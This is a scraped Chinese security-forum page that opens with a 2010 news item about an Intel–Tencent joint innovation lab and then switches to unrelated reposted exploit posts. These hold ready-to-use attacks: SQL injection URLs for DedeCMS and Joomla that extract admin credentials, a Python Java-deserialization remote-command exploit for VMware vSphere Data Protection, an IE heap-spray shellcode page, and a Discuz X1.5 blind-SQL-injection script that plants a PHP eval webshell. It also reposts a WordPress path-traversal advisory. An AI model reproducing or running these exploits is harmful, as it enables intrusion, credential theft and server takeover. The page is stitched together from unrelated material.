返回列表 发帖

英特尔与腾讯建立联合创新实验室

腾讯科技讯 北京时间11月3日,英特尔与腾讯公司签署了一项战略合作备忘录,旨在整合双方优势资源共同组建联合创新实验室,面向英特尔互联计算愿景和腾讯一站式在线生活服务目标,共推移动计算技术、产品与应用创新,为中国用户打造高品质移动生活体验。这是半年前两家公司宣布携手创新之后,双方合作内容的细化和深化。
    “计算已经成为我们日常生活不可或缺的一部分,英特尔正在改变开发和提供解决方案的方式,以实现互联计算愿景,” 英特尔公司高级副总裁兼软件与服务事业部总经理詹睿妮女士表示:“中国是世界上最大且最具增长潜力的移动通信市场,英特尔很高兴能够与中国互联网行业的领先厂商腾讯深化合作,共同把创新的高品质移动互联体验带给企业和个人用户。”
    当前,中国移动互联网用户数量迅速增长——随着3G网络覆盖全国,截止2010年6月底中国手机网民已达2.77亿人(数据来源:CNNIC报告)。而根据英特尔互联计算愿景,未来还将有数以亿计的移动终端如智能手机、平板电脑、车载信息设备等连接到互联网上,设备之间可实现互通一致切换,创造个性化的互联计算体验。英特尔架构正在为互联计算提供基础平台和核心技术驱动,帮助在诸多设备上实现高能效表现、安全性和互联网连接性。此次英特尔与腾讯深化双方战略合作,旨在将英特尔架构和软件技术的领先性和开放性,与腾讯的庞大用户基础和丰富应用服务相结合,有助于为国内用户创造集通信、互动及娱乐为一体、前所未有的高品质移动互联体验。
    根据签署的战略合作备忘录,双方希望立足于共同组建的联合创新实验室,计划基于英特尔?凌动?处理器和MeeGo*操作系统,打造一个更完备、更具市场竞争力的腾讯移动服务平台,除了开发更加友好的用户界面外,还将移动互联服务与终端设备软件完美结合,为终端用户提供无所不在的、全面整合的移动生活体验;未来,双方还将根据三网融合、云计算等发展趋势不断扩展技术和业务合作领域,包括面向不同屏幕规格和外形尺寸的便携设备,共推移动计算产品与应用创新,从而更好地支持腾讯为用户提供一站式在线生活服务的战略目标。
    “腾讯公司在中国拥有超过6亿注1的活跃帐户数,同时腾讯认同英特尔提出的互联计算愿景,也非常看重英特尔架构和软件技术所提供的广阔创新机遇,”腾讯公司联席首席技术官熊明华表示:“腾讯公司响应国家关于加快战略性新兴产业,尤其是新一代信息技术产业发展的要求,希望和英特尔强强携手、合作创新,面向新一代移动通信,打造全面整合的腾讯移动服务平台,并将一站式在线生活服务推送到下一代移动互联网智能终端和广大用户手中。”
    通过支持产业合作伙伴的创新助力中国战略性新兴产业发展和创新型经济,是英特尔一贯承诺的体现。2010年4月在北京举行的英特尔信息技术峰会(IDF2010)期间,英特尔和腾讯达成合作意向,宣布基于英特尔下一代移动计算平台和MeeGo*操作系统携手创新。根据英特尔和腾讯最新签订的战略合作备忘录,双方将实现优势互补,英特尔除计划为腾讯提供硬件、软件技术和创新资金支持,还可以通过英特尔软件服务全球生态链,支持腾讯QQ扩展海外服务网络。英特尔将通过深化本地合作延续其承诺,与中国IT产业共同迎接互联计算和“智能化”革命所带来的全新机遇。

 

您可能还想看的主题:

马化腾首次表态:手机安全不能交给一家公司

研究人员发现新型“无文件”恶意软件

谁知道 下面是如何计算出来的? 有报酬 高手来

腾讯、百度、金山共建最大反欺诈网址库

人民搜索推新版新闻搜索 联合中科院建实验室

英特尔收购McAfee交易恐因欧盟审查而推迟

腾讯发布盲人专用手机QQ

大学生QQ相约自杀 腾讯被判承担10%责任并赔偿

360与腾讯响应工信部要求 分别公开道歉

腾讯360掐架惹怒网民 有网络公司发布QQ劝架补丁

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

DEDECMS5.1 feedback_js.php注入漏洞
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞


影响版本: dedecms GBK 5.1漏洞描述: 在magic_quotes_gpc=off的情况下可用 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl ...... $urlindex = 0; if(empty($arcID)) {         $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");        //此处$arcurl没有过滤         if(is_array($row)) $urlindex = $row['id'];       //存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了 } if(empty($arcID) &amp;&amp; empty($urlindex)) exit(); //如果$arcID为空或$urlindex为空则退出 ...... if(empty($arcID)) $wq = " urlindex = '$urlindex' "; //我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了. else $wq = " aid='$arcID' "; $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc"; $dlist->Init(); $dlist->SetSource($querystring); 为了闭合我用了两次union http://www.sitedir.com.cn/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='</TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

VMware 5.x /6.x vSphere数据保护Java序列化远程执行漏洞
#!/usr/bin/env python


import socket
import sys
import ssl


def getHeader():
    return 'x4ax52x4dx49x00x02x4b'

def payload():
    cmd = sys.argv[4]
    cmdlen = len(cmd)
    data2 = 'x00x09x31x32x37x2ex30x2ex31x2ex31x00x00x00x00x50xacxedx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4dxc9xd4xe6x3bxdfx74x00x05x70x77x6ex65x64x73x7dx00x00x00x01x00x0fx6ax61x76x61x2ex72x6dx69x2ex52x65x6dx6fx74x65x70x78x72x00x17x6ax61x76x61x2ex6cx61x6ex67x2ex72x65x66x6cx65x63x74x2ex50x72x6fx78x79xe1x27xdax20xccx10x43xcbx02x00x01x4cx00x01x68x74x00x25x4cx6ax61x76x61x2fx6cx61x6ex67x2fx72x65x66x6cx65x63x74x2fx49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x3bx70x78x70x73x72x00x32x73x75x6ex2ex72x65x66x6cx65x63x74x2ex61x6ex6ex6fx74x61x74x69x6fx6ex2ex41x6ex6ex6fx74x61x74x69x6fx6ex49x6ex76x6fx63x61x74x69x6fx6ex48x61x6ex64x6cx65x72x55xcaxf5x0fx15xcbx7exa5x02x00x02x4cx00x0cx6dx65x6dx62x65x72x56x61x6cx75x65x73x74x00x0fx4cx6ax61x76x61x2fx75x74x69x6cx2fx4dx61x70x3bx4cx00x04x74x79x70x65x74x00x11x4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x70x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x71x00x7ex00x00x73x71x00x7ex00x05x73x7dx00x00x00x01x00x0dx6ax61x76x61x2ex75x74x69x6cx2ex4dx61x70x70x78x71x00x7ex00x02x73x71x00x7ex00x05x73x72x00x2ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex6dx61x70x2ex4cx61x7ax79x4dx61x70x6exe5x94x82x9ex79x10x94x03x00x01x4cx00x07x66x61x63x74x6fx72x79x74x00x2cx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x68x61x69x6ex65x64x54x72x61x6ex73x66x6fx72x6dx65x72x30xc7x97xecx28x7ax97x04x02x00x01x5bx00x0dx69x54x72x61x6ex73x66x6fx72x6dx65x72x73x74x00x2dx5bx4cx6fx72x67x2fx61x70x61x63x68x65x2fx63x6fx6dx6dx6fx6ex73x2fx63x6fx6cx6cx65x63x74x69x6fx6ex73x2fx54x72x61x6ex73x66x6fx72x6dx65x72x3bx70x78x70x75x72x00x2dx5bx4cx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex54x72x61x6ex73x66x6fx72x6dx65x72x3bxbdx56x2axf1xd8x34x18x99x02x00x00x70x78x70x00x00x00x05x73x72x00x3bx6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex43x6fx6ex73x74x61x6ex74x54x72x61x6ex73x66x6fx72x6dx65x72x58x76x90x11x41x02xb1x94x02x00x01x4cx00x09x69x43x6fx6ex73x74x61x6ex74x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx70x78x70x76x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex52x75x6ex74x69x6dx65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x73x72x00x3ax6fx72x67x2ex61x70x61x63x68x65x2ex63x6fx6dx6dx6fx6ex73x2ex63x6fx6cx6cx65x63x74x69x6fx6ex73x2ex66x75x6ex63x74x6fx72x73x2ex49x6ex76x6fx6bx65x72x54x72x61x6ex73x66x6fx72x6dx65x72x87xe8xffx6bx7bx7cxcex38x02x00x03x5bx00x05x69x41x72x67x73x74x00x13x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx4fx62x6ax65x63x74x3bx4cx00x0bx69x4dx65x74x68x6fx64x4ex61x6dx65x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx5bx00x0bx69x50x61x72x61x6dx54x79x70x65x73x74x00x12x5bx4cx6ax61x76x61x2fx6cx61x6ex67x2fx43x6cx61x73x73x3bx70x78x70x75x72x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90xcex58x9fx10x73x29x6cx02x00x00x70x78x70x00x00x00x02x74x00x0ax67x65x74x52x75x6ex74x69x6dx65x75x72x00x12x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex43x6cx61x73x73x3bxabx16xd7xaexcbxcdx5ax99x02x00x00x70x78x70x00x00x00x00x74x00x09x67x65x74x4dx65x74x68x6fx64x75x71x00x7ex00x24x00x00x00x02x76x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67xa0xf0xa4x38x7ax3bxb3x42x02x00x00x70x78x70x76x71x00x7ex00x24x73x71x00x7ex00x1cx75x71x00x7ex00x21x00x00x00x02x70x75x71x00x7ex00x21x00x00x00x00x74x00x06x69x6ex76x6fx6bx65x75x71x00x7ex00x24x00x00x00x02x76x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x00x00x00x00x00x00x00x00x00x00x00x70x78x70x76x71x00x7ex00x21x73x71x00x7ex00x1cx75x72x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00x70x78x70x00x00x00x01x74'
    data2 += 'x00' + chr(cmdlen)
    data2 += cmd
    data2 += 'x74x00x04x65x78x65x63x75x71x00x7ex00x24x00x00x00x01x71x00x7ex00x29x73x71x00x7ex00x17x73x72x00x11x6ax61x76x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75x65x70x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4ex75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00x70x78x70x00x00x00x01x73x71x00x7ex00x09x3fx40x00x00x00x00x00x10x77x08x00x00x00x10x00x00x00x00x78x78x76x72x00x12x6ax61x76x61x2ex6cx61x6ex67x2ex4fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x71x00x7ex00x3fx78x71x00x7ex00x3f'
    return data2

def sslMode():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")

def exploitTarget(sock):
    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)
    print 'sending exploit headers
'
    sock.send(getHeader())
    sock.recv(8192)
    print 'sending exploit
'
    sock.send(payload())
    sock.close()
    print 'exploit completed.'

if __name__ == "__main__":
    if len(sys.argv) != 5:
        print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
        print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
        sys.exit(0)
    else:
        sock = None
        if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True:
            sock = sslMode()
        if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
        exploitTarget(sock)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Joomla最新SQL注射漏洞
# Title: Joomla (Job Component) SQL Injection Vulnerability
# EDB-ID: 11307
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-02-01


<table>[~]>> ...[BEGIN ADVISORY]...


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> TITLE: Joomla (Job Component) SQL Injection Vulnerability


</table>

<table>[~]>> LANGUAGE: PHP


</table>

<table>[~]>> RESEARCHER: B-HUNT3|2


</table>

<table>[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com


</table>

<table>  


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> DESCRIPTION: Input var id_job is vulnerable to SQL Code Injection


</table>

<table>[~]>> AFFECTED VERSIONS: N/A


</table>

<table>[~]>> RISK: Medium/High


</table>

<table>[~]>> IMPACT: Execute Arbitrary SQL queries


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> PROOF OF CONCEPT:


</table>

<table>  


</table>

<table>[~]>> http://server/index.php?option=com_job&amp;controller=listcategory&amp;task=viewJob&amp;id_job=[SQL]


</table>

<table>  


</table>

<table>[~]>> http://server/index.php?option=com_job&amp;controller=listcategory&amp;task=viewJob&amp;id_job=-1+UNION+ALL+SELECT+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+FROM+jos_users--


</table>

<table>  


</table>

<table>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


</table>

<table>  


</table>

<table>[~]>> ...[END ADVISORY]...


</table>






















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Microsoft SQL Server Distributed Management溢出
<!--+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow+ Critical: Critical (remote)+ Impact: MS Internet Explorer 6 -> Code Execute+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)+ Reference &amp; Thanks :      code by rgod http://www.milw0rm.com/exploits/4379     code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426+ Author: 96sysim (sysim@nate.com)--><html><object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object><SCRIPT language="javascript">// Heap Spray // execute "calc.exe"shellcode =unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");bigblock = unescape("%u9090%u9090");headersize = 20;slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memory = new Array();for (i=0;i<501;i++) memory = block + shellcode;</SCRIPT><script language='vbscript'>targetFile = "C:ProgrammiMicrosoft SQL Server80ToolsBinnsqldmo.dll"prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"memberName = "Start"progid     = "SQLDMO.SQLServer"argCount   = 4myseh        = unescape("%u0D0D%u0D0D")   // heap spray range - possible changeStartMode =TrueServer    ="http://ZZZZYYYYXXXXWW?WVVVVAAAAAAAAAAAAAAAAAA@AA        es        est        est        es.        testMMMMLLLLKKKJJJJIIIIHH.HGGGGGFFFFEEEEDDDDDDDBBBBAAAA\\\\:#$%AAAABBBBCCCCDD?DEEEEFFFFGGG\:#$%HHHHHIIII        e@st        es        est        est        es.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBBAAAAZZ\\\\:#$%YYYYXXXXWWWWVV?VUUUUTTTTSSS\:#$%RRRRRQQQQPP@PPOOONNNNMMMMLLL.KKKKKJJJJIIIIHHHGGGGFFFFEE.EDDDDDDDDDBBBBAAAAAAAAAAAAAAA\\\\:#$%AAAAAAAAAAAAAA?Awwwwvvvvuuu\:#$%        ttttssss
r@rrqqqppppoooo
nn.mmmmmllllkkkkjjjiiiihhhhgg.gfffffeeeeddddcccbbbaaaaAAAA\\\"Login     ="aaaaaaaa"Password  ="bbbbbbbb"SQLServer.Start StartMode ,Server ,Login ,Password</script></html>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

星期一要去绿盟科技面试了-伤心的鱼
来源:伤心的鱼BLOG  http://www.hack521.cn
版权属于:伤心的鱼
昨天跟黑手的编辑在聊天的时候看见他说一朋友的公司要招聘安全工程师 要求对渗透有一定了解.想想自己也满足人家的要求吧 ..就给了一份简历 没上到今天上午这个公司就给我打电话了。 让我星期一过去一趟昨天我只知道是个安全公司 但是没想到是绿盟科技 这个以前一直就听说的业内的权威公司对我来说是一个幻想中的地方 没想到真的要去那面试 呵呵 对我来说是一个机会 也是一个挑战 不管成与不成都是自己的一个经历 小志说的对 不管怎么样也去绿盟面试过 呵呵 给自己加油相信自己的最棒的


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

WordPress Photo Gallery 1.3.34 / 1.3.42路径遍历漏洞
Details
================
Software: Photo Gallery
Version: 1.3.34,1.3.42
Homepage: https://wordpress.org/plugins/photo-gallery/
Advisory report: https://security.dxw.com/advisories/path-traversal-in-photo-gallery-may-allow-admins-to-read-most-files-on-the-filesystem/
CVE: Awaiting assignment
CVSS: 4 (Medium; AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description
================
Path traversal in Photo Gallery may allow admins to read most files on the filesystem

Vulnerability
================
The plugin contains a file manager component which allows broad access to the filesystem including deleting files, uploading files, and moving files. In this proof-of-concept weall be usingA pathA traversal to copy a configurationA file from /etc into a web-readable directory in order to allow the attacker to read secrets.

Proof of concept
================

Visit:A http://localhost/wp-admin/admin.php?page=galleries_bwg
Click Add new then Add Images
Right-click on the file manager overlay, click Inspect, and use the dev tools to get the URL of this iframe
RemoveA &amp;extensions=jpg%2Cjpeg%2Cpng%2Cgif from the URL
Append &amp;dir=/../../../../../../etc/ to the URL
Visit that URL
Select the passwd fileA by clicking on it once
Press the copy button in the toolbar
Press the up button repeatedly until you arrive back at wp-content/uploads/photo-gallery
Press the paste button
VisitA http://localhost/wp-content/uploads/photo-gallery/passwdA to read the list of users

The number of ../A you need to add to the URL will vary,A and the web serverA may be configured to only allowA reading files with certain extensions.

Mitigations
================
Upgrade to version 1.3.43 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2017-03-29: Discovered
2017-05-26: Reported toA support@web-dorado.com
2017-05-29:A Received reply saying it would be fixedA in 1.3.43
2017-05-30: Version 1.3.43 was released
2017-06-16: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

EZEIP3.0 多页面上传验证漏洞
1.修改IE浏览器的安全设置,调制最高,然而禁止js执行。


2.打开修改上传类型页面,添加aspx类型,点击保存,再打开上传页面上传


存在问题的上传类型页面:
http://www.sitedirsec.com/whir_system/module/config/upload.aspx


上传页面:


http://www.XXX.com/whir_system/module/picture/radiopictureselect.aspx


http://www.XXX.com/whir_system/module/picture/uploadpicture.aspx


http://www.XXX.com/whir_system/module/picture/pictureselect.aspx


http://www.xxxj.com/whir_system/module/picture/picturesingleselect.aspx


http://www.xxx.com/whir_system/module/video/videoupload.aspx


此程序多为政府或中型网站使用,如网络管理员看到应尽快修复。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

近日流传的Discuz 1.5最新0day
<?phpprint_r(‘+—————————————————————————+Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57    2010.11.05mail: toby57 at 163 dot com说明:alibaba把后续getshell代码添加了下去+—————————————————————————+‘);if ($argc < 2) {    print_r(‘+—————————————————————————+Usage: php ‘.$argv[0].’ url [pre]Example:php ‘.$argv[0].’ http://localhost/php ‘.$argv[0].’ http://localhost/ xss_+—————————————————————————+‘);    exit;}error_reporting(7);ini_set(‘max_execution_time’ 0);$url = $argv[1];$pre = $argv[2]?$argv[2]:’pre_’;$target = parse_url($url);extract($target);$path1 = $path . ‘/api/trade/notify_credit.php’;$hash = array();$hash = array_merge($hash range(48 57));$hash = array_merge($hash range(97 102));$tmp_expstr = “‘”;$res = send();if(strpos($res’SQL syntax’)==false){var_dump($res);die(‘Oooops.I can NOT hack it.’);}preg_match(‘/FROMs([a-zA-Z_]+)forum_order/’$res$match);if($match[1])$pre = $match[1];$tmp_expstr = “‘ UNION ALL SELECT 0100000000 FROM {$pre}common_setting WHERE ”=’”;$res = send();if(strpos($res”doesn’t exist”)!==false){    echo “Table_pre is WRONG!nReady to Crack It.Please Waiting..n”;    for($i = 1;$i<20;$i++){    $tmp_expstr = “‘ UNION ALL SELECT 0100000000 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND LENGTH(REPLACE(table_name’forum_post_tableid’”))=$i AND ”=’”;    $res = send();    if(strpos($res’SQL syntax’)!==false){      $pre = ”;    $hash2 = array();    $hash2 = array_merge($hash2 range(48 57));    $hash2 = array_merge($hash2 range(97 122));    $hash2[] = 95;    for($j = 1;$j <= $i; $j++){    for ($k = 0; $k <= 255; $k++) {    if(in_array($k $hash2)) {    $char = dechex($k);    $tmp_expstr = “‘ UNION ALL SELECT 0100000000 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE ‘%forum_post_tableid%’ AND MID(REPLACE(table_name’forum_post_tableid’”)$j1)=0x{$char} AND ”=’”;    $res = send();    if(strpos($res’SQL syntax’)!==false){        echo chr($k);        $pre .= chr($k);break;    }     }     }        }        if(strlen($pre)){echo “nCracked…Table_Pre:”.$pre.”n”;break;}else{die(‘GET Table_pre Failed..’);};    }    }    };echo “Please Waiting….n”;$sitekey = ”;for($i = 1;$i <= 32; $i++){  for ($k = 0; $k <= 255; $k++) {    if(in_array($k $hash)) {    $char = dechex($k);$tmp_expstr = “‘ UNION ALL SELECT 0100000000 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue{$i}1)=0x{$char} AND ”=’”;$res = send();if(strpos($res’SQL syntax’)!==false){        echo chr($k);        $sitekey .= chr($k);break;}}}}/*By: alibaba修改与添加了一些代码,如果成功就能得到shell一句话秘密是 : cmd*/if(strlen($sitekey)!=32){echo “nmy_sitekey not found. try blank my_sitekeyn”;}else echo “nmy_sitekey:{$sitekey}n”;echo “nUploading Shell…”;$module = ‘video’;$method = ‘authauth’;$params = ‘a:3:{i:0;i:1;i:1;s:36:”PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=”;i:2;s:3:”php”;}’;$sign = md5($module . ‘|’ . $method . ‘|’ . $params . ‘|’ . $sitekey);$data = “module=$module&amp;method=$method&amp;params=$params&amp;sign=$sign”;$path2 = $path . “/api/manyou/my.php”;POST($host80$path2$data30);echo “nGetting Shell Location…n”;$file = ”;for($i = 1;$i <= 32; $i++){for ($k = 0; $k <= 255; $k++) {     if(in_array($k $hash)) {   $char = dechex($k);   $tmp_expstr = “‘ UNION ALL SELECT 0100000000 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto{$i}1)=0x{$char} AND ”=’”;   $res = send();   if(strpos($res’SQL syntax’)!==false){    echo chr($k);    $file .= chr($k);break;   }  }}}echo “nShell: $host$path/data/avatar/”. substr($file01) . “/” . substr($file11) . “/$file.php”;exit;function sign($exp_str){    return md5(“attach=tenpay&amp;mch_vno={$exp_str}&amp;retcode=0&amp;key=”);}function send(){    global $host $path1 $tmp_expstr;    $expdata = “attach=tenpay&amp;retcode=0&amp;trade_no=%2527&amp;mch_vno=”.urlencode(urlencode($tmp_expstr)).”&amp;sign=”.sign($tmp_expstr);    return POST($host80$path1$expdata30);}  function POST($host$port$path$data$timeout $cookie=”) {$buffer=”;    $fp = fsockopen($host$port$errno$errstr$timeout);    if(!$fp) die($host.’/’.$path.’ : ‘.$errstr.$errno);else {        fputs($fp “POST $path HTTP/1.0rn”);        fputs($fp “Host: $hostrn”);        fputs($fp “Content-type: application/x-www-form-urlencodedrn”);        fputs($fp “Content-length: “.strlen($data).”rn”);        fputs($fp “Connection: closernrn”);        fputs($fp $data.”rnrn”);  while(!feof($fp))  {   $buffer .= fgets($fp4096);  }  fclose($fp);    }return $buffer;}?>使用方式: php x1.5.php http://www.**.com/本文作者toby57由alibaba添加getwebshell代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表